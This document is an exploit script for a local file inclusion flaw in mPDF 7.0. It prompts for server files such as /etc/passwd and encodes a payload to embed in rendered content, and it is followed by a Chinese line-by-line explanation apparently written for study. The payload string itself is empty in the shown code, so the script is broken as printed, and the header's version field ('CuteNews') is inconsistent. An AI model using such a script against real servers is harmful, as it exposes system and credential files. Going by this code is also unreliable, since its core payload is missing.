# Exploit Title: mPDF 7.0 - Local File Inclusion
# Google Dork: N/A
# Date: 2022-07-23
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://mpdf.github.io/
# Software Link: https://mpdf.github.io/
# Version: CuteNews
# Tested on: Ubuntu 20.04, mPDF 7.0.x
# CVE: N/A
#!/usr/bin/env python3
from urllib.parse import quote
from cmd import Cmd
from base64 import b64encode
class Terminal(Cmd):
prompt = "\nFile >> "
def default(self, args):
payload_gen(args)
def banner():
banner = """ _____ _____ ______ ______ ___ __ __ _ _ _
| __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) |
_ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_
| '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __|
| | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_
|_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__|
| |
|_| """
print(banner)
def payload_gen(fname):
payload = f' '
encoded_payload = quote(payload)
print("[+] Replace the content with the payload below")
print(f"Url encoded payload:\n{encoded_payload}\n")
base64enc = b64encode(encoded_payload.encode())
print(f"Base64 encoded payload:\n{base64enc.decode()}\n")
if __name__ == ("__main__"):
banner()
print("Enter Filename eg. /etc/passwd")
terminal= Terminal()
terminal.cmdloop()
line13:from urllib.parse import quote
quote函数的作用是将字符串中的某些特殊字符替换为%XX的形式
按照标准,URL只允许一部分ASCII字符,其他字符(如汉字)是不符合标准的,就要进行编码
line14:from cmd import Cmd
cmd模块是一个简易的命令行解析框架,可以创建简易的命令行解析器
line17:class Terminal(Cmd)
创建类并且继承了cmd.Cmd
line19-20:
default函数继承自cmd,需要用户重写方法,这个方法的作用是当解析器无法识别该命令时调用这个方法,此处是调用payload_gen()函数
line21-30:
花式banner信息
line31-38:
在字符串变量中定义payload变量,随后使用quote()函数做特殊字符的URL编码,然后再对字符串使用encode()将字符串从str类型转换成bytes类型。再然后使用b64encode做base64编码
line39-43:
主函数中关键是代码terminal.cmdloop(),这是cmd.Cmd模块中的方法,用于让命令行一直循环不退出。
参考链接:
https://blog.csdn.net/lucky404/article/details/79402478
https://www.exploit-db.com/exploits/50995